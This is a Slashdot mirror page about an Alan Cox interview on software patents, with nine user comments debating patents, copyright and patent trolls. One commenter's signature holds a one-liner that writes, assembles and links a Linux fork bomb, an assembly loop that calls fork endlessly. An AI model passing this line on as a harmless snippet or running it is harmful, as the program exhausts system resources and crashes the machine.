Slashdot Mirror


Alan Cox on Patent Law and GPLv3

tykev writes "Linux kernel guru Alan Cox talks about kernel features, cooperation with hardware vendors, and software patents. From the interview: 'I don't think [Microsoft's patent threats] are the biggest danger. As Microsoft has been finding out recently it is the patent trolls, and organisations with buried patents in interesting areas that are the biggest threat in the USA. The real answer to that problem, however, is to pull the USA back into line with the majority of the world which simply does not recognize patents on software but respects them as literary works subject to copyright law.'"

9 of 191 comments (clear)

  1. Re:One extreme to the next by McGiraf · · Score: 4, Insightful

    duh!

    Then you can't copy paste code , but every time you write a program from scratch you don't end up infringing 2347 vaguely worded patents preventing you from implementing even the most trivial computer tasks.

    I think you do not know what patents en copyrights are.

  2. Re:One extreme to the next by OrangeTide · · Score: 4, Insightful

    Because that is the closest thing. Paintings, statues, performances(including dance) can all be protected by copyright. Just because a software application has almost no artistic value does not mean it does not deserve the same kind of protection.

    If all software were public domain, there would be nothing preventing people from releasing GPL'd software as binary only, and refusing to share the modifications. (because there is no longer anything that holds them to the copyleft license)

    --
    “Common sense is not so common.” — Voltaire
  3. Re:One extreme to the next by DeepHurtn! · · Score: 4, Insightful

    I think the argument is that the code itself is subject to copywrite law. So I can't copy your code verbatim without your consent. Fair enough -- the GPL, for example, relies on copyright protection. Patents are a whole different beast, though -- if a programme is patentable, not only can't I copy your code, but I can't even independently implement whatever it is that it does. Which is pretty silly.

  4. Re:One extreme to the next by cfulmer · · Score: 4, Insightful

    In the U.S., literary works are one of the categories of work explicitly protected by copyright. Literary works, in that sense, are defined as "works, other than audiovisual works, expressed in words, numbers, or other verbal or numerical symbols or indicia . . ." Cox' point is that copyright protection is enough; you don't also need patent.

  5. Re:He's Right by daeg · · Score: 4, Insightful

    The stupid thing is that why should integrating with Windows infringe on patents at all? I paid for software, I should be free to do with it as I please. If they aren't ready to accept me tinkering with it, they should never have sold it in the first place.

    When I buy a car, I can take a sludge hammer to it. I can chop it up into tiny pieces and re-sell it. I can repaint it, put new seats in, I can even replace the engine. Why should software be any different? Are there any other industries protected by such a strong veil?

  6. Re:No s***. But "recently"? by Dan+Ost · · Score: 4, Insightful

    So, how exactly does a patent collection defend against patent trolls?

    The whole idea of the patent troll is that they don't have any business to defend so that they can use their patents offensively without worrying about (non-karmic) retaliation.

    --

    *sigh* back to work...
  7. 20 years! by farkus888 · · Score: 4, Insightful

    I don't think that patents are an entirely faulty method of protecting software that is innovative. the real reason I feel that they are horrible for software is their 20 year lifespan. compare that to Moore's law. a single lucky patent of the right idea can guarantee you a monopoly for generations of software. 20 years is likely enough to get you sole rights to an idea for all of its useful lifetime. imagine if the patent for the typewriter were to be set to expire next year? as society continues to advance at faster rates the lifetime of a patent needs to get accordingly shorter or it will stifle creativity and slow human advances to a rate set by the lifespan of the patent.

    --
    thats right, I rarely use capitals. deal with it. but don't mistake my laziness for stupidity
  8. "Organically-evolved law"? by gdek · · Score: 4, Insightful

    Horseshit. There's nothing "organically evolved" about the disaster that is US software patent law. There's one ridiculous appellate ruling, from which the rest of this shitstorm has inexorably followed.

    The entire history of time until 1998: for the most part, neither algorithms nor business practices are held to be patentable, since they are both held to be "abstract ideas," which are not patentable. There are exceptions, but they are rare.

    The State Street ruling, 1998: Hey, let's change the legal test for patentable software from "causing a physical transformation" to producing "useful, concrete and tangible results". Vague enough for ya? Awesome. And while we're at it, let's also apply the same completely meaningless legal test to business practices, too!

    The history of software patents since 1998: One patent on Zocor! One patent on Viagra! SIXTEEN patents by Microsoft of movement and positioning of a cursor! Gee whiz, maybe we should fix this problem. Oh, wait... we wouldn't want to "dismantle organically-evolved law from the top-down", because Anonymous Coward says that such actions always result in DISASTER!

    "Dismantle organically-evolved law from the top-down". Fantastic. What the hell does that even *mean*?

  9. Re:Alan Cox can suck it by Hal_Porter · · Score: 4, Insightful

    You mean like the American Constitution? Look at the current situation---reject it. Think about what you think should be---write it down. Implement (always a tough bit, difficult to get good program managers).

    That only worked because the founders were remarkably principled and selfless individuals. If any of them had been Stalin or Robespierre type figures who believed they should have absolute power, the American revolution would have been a disaster like the French one, or the Russian one. Or pretty much any revolution apart from the American one in fact.

    Americans are right to celebrate their founders, particularly George Washington. He could easily have ruled until he died and then found some constitutional device to pass power to his heir. As Jefferson put it

    "The moderation and virtue of a single character probably prevented this Revolution from being closed, as most others have been, by a subversion of that liberty it was intended to establish."

    Comparing the first post revolutionary leader to a project manager is disingenous in the extreme. You basically need to have an almost perfect leader in this situation who will allow a system to be set up which will constrain his actions to set a precedent for his successors. It's all to easy to use real and imagined threats to the regime as an excuse to set up a tyranny.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;